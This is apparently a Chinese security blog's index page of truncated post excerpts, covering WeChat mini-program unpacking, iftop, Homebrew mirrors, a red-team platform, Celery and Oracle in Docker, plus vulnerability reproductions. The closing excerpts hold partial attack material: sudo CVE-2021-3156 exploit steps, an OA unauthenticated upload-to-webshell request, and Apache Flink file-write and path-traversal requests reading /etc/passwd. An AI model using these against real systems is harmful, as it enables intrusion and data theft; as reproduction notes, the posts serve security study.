小程序渗透测试-前端打包调试解密
0x01 用到的环境
node环境
wxappUnpacker
微信开发者工具
网易mumu模拟器(Android6版本)
mt管理器(模拟器中的文件管理工具)
0x02 编译阶段
首先找到小程序的安装包,可以找个手机,点开小程序后,找到手机文件目录, 一般是这样的目录。
1/data/data/com.tencent.mm/MicromMsg/c6dxxxxxxxxxxxxx/appbrand/pkg/*.wxapkg
注:此时必须root
mt管理器
然后自己想办法现在把这些包从手机里导出来(如果很多wxapkg建议清理一下,重启目标小程序。)
0x03 反编译wxapkg获取源文件Github上已经有大神写的node.js版本的,当然也有其它版本的,例如python版本,不用管什么版本的,能用就行了。
GitHub地址:
https://github.com/qwerty472123/wxappUnpacker
进入到下载好的反编译脚本目录下,在node命令窗口中依次安装需要的依赖。
项目中列出来的需要安装的依赖不全,如果报错,看下issues就行了,下面是在我 ...
使用iftop 流量监控 速率监控
0x00 使用iftop 流量监控 速率监控使用iftop对流量监控,对总的发送速率进行监控
0x01 mac 安装 iftop1brew reinstall iftop
注:如果出现403的报错,下载直接失败的情况,建议换homebrew的源,再进行安装
参考 https://blog.csdn.net/god\_zzZ/article/details/119422419
加入软连接1ln -s /usr/local/Cellar/iftop/1.0pre4/sbin/iftop /usr/local/bin/iftop
查看帮助,安装成功
1iftop -h
0x02 简单使用监控 en0 网卡的流量
1sudo iftop -i en0
其他选项设置
123456789101112131415161718192021-i设定监测的网卡,如:# iftop -i eth1-B 以bytes为单位显示流量(默认是bits),如:# iftop -B-n使host信息默认直接都显示IP,如:# iftop -n-N使端口信息默认直接都显示端口号,如: # iftop ...
MAC Brew 国内 换源
mac Brew 国内 换源Brew源
12cd "$(brew --repo)"git remote set-url origin https://mirrors.ustc.edu.cn/brew.git
软件源
1234cd "$(brew --repo)/Library/Taps/homebrew/homebrew-core"git remote set-url origin https://mirrors.ustc.edu.cn/homebrew-core.gitcd "$(brew --repo)"/Library/Taps/homebrew/homebrew-caskgit remote set-url origin https://mirrors.ustc.edu.cn/homebrew-cask.git
Bottles源
12echo 'export HOMEBREW_BOTTLE_DOMAIN=https://mirrors.ustc.edu.cn/homebrew-bottles' ...
关于红队武器库项目介绍
0x00 武器库前后端分离项目:https://github.com/godzeo/ArsenalWeb
本项目是一个红队武器库平台,包含常用的一些红队功能,也会集合一些其他好用的工具到里面
正在开发中…
暂时不全部开源,因为还有很多bug和代码质量有点烂…
开发
前后端分离项目:
后端:采用django+django-rest-framework,
前端采用vue+ElementUI
JWT认证,支持swagger
必要环境
Redis+npm+Python3.7
0x02 组件(功能)
红队最新漏洞共享 (markdown格式)
企业信息收集(前端界面简陋,数据源:企查查)
单个网站漏洞扫描
漏洞扫描 (大规模资产漏扫扫描)
其他系统功能
TODO
缺少一个数据清洗
大规模资产漏扫扫描流程:
根域名收集 (可借助企业信息收集模块)
子域名收集
被动信息收集(fofa,sodan)
IP地址解析
端口指纹扫描 (web-top 20)
WEB服务探测
waf检测
重要应用指纹识别(指纹识别模块)
自建POC扫描(想兼容最新发现goby的poc格 ...
Celery在DJANGO中的简单使用
Celery 简介 除了redis,还可以使用另外一个神器—Celery。Celery是一个异步任务的调度工具。
Celery 是 Distributed Task Queue,分布式任务队列,分布式决定了可以有多个 worker 的存在,队列表示其是异步操作,即存在一个产生任务提出需求的工头,和一群等着被分配工作的码农。
在 Python 中定义 Celery 的时候,我们要引入 Broker,中文翻译过来就是“中间人”的意思,在这里 Broker 起到一个中间人的角色。在工头提出任务的时候,把所有的任务放到 Broker 里面,在 Broker 的另外一头,一群码农等着取出一个个任务准备着手做。
这种模式注定了整个系统会是个开环系统,工头对于码农们把任务做的怎样是不知情的。所以我们要引入 Backend 来保存每次任务的结果。这个 Backend 有点像我们的 Broker,也是存储任务的信息用的,只不过这里存的是那些任务的返回结果。我们可以选择只让错误执行的任务返回结果到 Backend,这样我们取回结果,便可以知道有多少任务执行失败了。
Celery(芹菜 ...
Docker快速搭建Oracle服务,导入dmp文件
Docker快速搭建Oracle服务,导入dmp文件代码审计遇到oracle数据库,记录一下如何快速的搭建,然后导入dmp数据库备份文件
0x01 前置环境
macos
Docker
0x02 搭建Oracle服务1、拉取Oracle镜像
1docker pull registry.cn-hangzhou.aliyuncs.com/helowin/oracle_11g
2、运行镜像
1docker run -p 1521:1521 --name oracle_11g --restart=always -v /Users/zy/Desktop/logs:/home/oracle/app/oracle/oradata/mydata registry.cn-hangzhou.aliyuncs.com/helowin/oracle_11g
123456-v /Users/zy/Desktop/logs:/home/oracle/app/oracle/oradata/mydata前面/Users/zy/Desktop/logs 是物理机器的路径/home/oracle/app/or ...
Linux sudo 提权漏洞 CVE-2021-3156 复现 附exp
0x01 CVE-2021-3156: 缓冲区溢出漏洞在sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户(普通用户和系统用户,sudoer和非sudoers)都可以利用此漏洞,而无需进行身份验证,攻击者不需要知道用户的密码。成功利用此漏洞可以获得root权限。
0x02 影响版本Sudo 1.8.2 - 1.8.31p2
Sudo 1.9.0 - 1.9.5p1
不受影响版本
Sudo =>1.9.5p2
0x03 漏洞检测测试环境:ubuntu:20.04
检测是否存在
1sudoedit -s /
如下以sudoedit:开头报错则存在此漏洞
如果响应一个以usage:开头的报错,那么表明补丁已经生效
0x04 漏洞复现exp当前用户为普通用户
下载EXP
1git clone https://github.com/blasty/CVE-2021-3156.git
进入编译一下
1234567$ makerm -rf libnss_Xmkdir libnss_Xgcc -std=c99 -o sudo-hax-me-a-sandwic ...
某OA ajax.do 未授权漏洞任意文件上传getshell复现
某OA ajax.do 未授权漏洞任意文件上传getshell复现0x00 简介某OA A8 是一款流行的协同管理软件,在各中、大型企业机构中广泛使用。
由于某旧版本某些接口能被未授权访问,并且部分函数存在过滤不足,攻击者通过构造恶意请求,权限绕过漏洞,可在无需登录的情况下上传恶意脚本文件,从而控制服务器
0x01 影响范围某OA V8.0某OA V7.1、V7.1SP1某OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3某OA V6.0、V6.1SP1、V6.1SP2某OA V5.x
0x02:漏洞复现一、首先测试漏洞环境是否存在POC验证漏洞存在否
1127.0.0.1:8002/seeyon/thirdpartyController.do.css/..;/ajax.do
利用PAYLOAD
1234567891011121314151617POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress ...
CVE-2020-17518 任意文件写漏洞复现
0x01 漏洞简介Apache FlinkApache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。
CVE-2020-17518 任意文件写漏洞Apache Flink 1.11.0中引入了一项更新,该更新在1.11.1及更高的版本和1.11.2中发布。
Apache Flink 控制面板的Submit New Job处存在任意文件上传:
0x02 影响版本1231.11.01.11.11.11.2
0x03 漏洞复现
写入EXP:
123456789101112131415POST /jars/upload HTTP/1.1Host: 127.0.0.1:8081Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Connection: clo ...
漏洞复现 Apache Flink CVE-2020-17519 任意文件读取漏洞
0x01 漏洞简介Apache FlinkApache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。
CVE-2020-17519 任意文件读取漏洞Apache Flink 1.11.0中引入了一项更新,该更新在1.11.1及更高的版本和1.11.2中发布。
该项更新允许攻击者通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件
0x02 影响版本1231.11.01.11.11.11.2
0x03 漏洞复现
POC:
12http://127.0.0.1/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
0x05 修复建议所有用户升级最新版
1https://flink.apache.org/downloads.html